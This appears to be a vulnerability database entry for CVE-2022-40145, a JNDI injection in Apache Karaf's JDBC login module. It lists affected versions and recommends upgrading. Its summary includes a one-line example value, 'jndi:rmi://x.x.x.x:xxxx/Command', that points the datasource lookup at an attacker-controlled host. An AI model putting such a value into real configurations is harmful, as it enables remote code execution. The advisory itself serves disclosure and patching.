CVE-2022-40145 - This vulnerable is about a potential code injection when an attacker has control of the target LDAP

CVE-2022-40145

Summary

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

References

https://karaf.apache.org/security/cve-2022-40145.txt

Vulnerable Configurations

cpe:2.3:a:apache:karaf:4.4.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.4.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.4.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.4.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.0.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.0.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.1.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.1.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.1.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.1.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.1.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.1.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.1.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.1.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.1.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.1.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.1.5:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.1.5:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.1.6:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.1.6:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.5:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.5:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.6:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.6:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.7:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.7:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.8:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.8:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.9:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.9:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.10:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.10:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.11:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.2.11:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.5:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.5:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.6:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.6:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.7:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.7:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.8:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.8:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.9:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.9:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.10:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.10:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.11:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.11:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.12:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.3.12:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.4.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.4.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.4.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.4.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.4.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.4.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.4.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.4.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.4.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.4.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.7.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:2.7.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.0:rc1:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.0:rc1:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.5:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.5:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.6:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.6:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.7:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.7:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.8:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.8:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.9:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:3.0.9:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.0:milestone1:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.0:milestone1:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.0:milestone2:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.0:milestone2:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.0:milestone3:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.0:milestone3:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.5:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.5:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.6:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.6:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.7:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.7:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.8:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.8:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.9:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.9:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.10:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.0.10:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.1.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.1.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.1.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.1.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.1.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.1.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.1.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.1.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.1.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.1.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.1.5:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.1.5:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.1.6:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.1.6:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.1.7:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.1.7:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.0:milestone1:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.0:milestone1:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.0:milestone2:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.0:milestone2:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.5:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.5:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.9:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.9:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.10:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.10:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.11:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.11:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.12:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.12:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.13:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.13:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.14:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.14:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.15:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.2.15:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.3.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.3.0:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.3.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.3.1:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.3.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.3.2:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.3.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.3.3:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.3.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.3.4:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.3.5:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.3.5:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.3.6:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.3.6:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.3.7:*:*:*:*:*:*:*
cpe:2.3:a:apache:karaf:4.3.7:*:*:*:*:*:*:*

CVSS

Base:	None
Impact:
Exploitability:

CWE

NVD-CWE-Other

CAPEC

Access

Vector	Complexity	Authentication

Impact

Confidentiality	Integrity	Availability

Last major update

27-06-2023 - 18:34

Published

21-12-2022 - 16:15

Last modified

27-06-2023 - 18:34